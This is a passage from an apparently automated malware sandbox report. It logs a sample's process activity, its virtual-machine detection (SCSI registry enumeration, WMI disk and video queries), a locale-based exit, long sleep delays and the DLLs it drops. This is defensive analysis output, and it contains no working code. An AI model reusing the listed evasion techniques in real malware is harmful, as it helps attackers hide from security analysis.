Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_1-80891

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 27B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 26F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 15E0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 33A0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 1800000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 5269			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 4126			Jump to behavior

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_0-39246

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bxhlahunbhc	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\osssciedmed	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u3bs.2\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u3bs.2\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	API coverage: 9.8 %
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	API coverage: 6.2 %
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	API coverage: 2.4 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5772	Thread sleep time: -35971150943733603s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5772	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -30265s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5772	Thread sleep time: -59883s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -37036s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5772	Thread sleep time: -59772s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -47193s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5772	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -39525s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -37399s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -50848s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -45672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -55665s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -31071s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864	Thread sleep time: -46697s >= -30000s	Jump to behavior
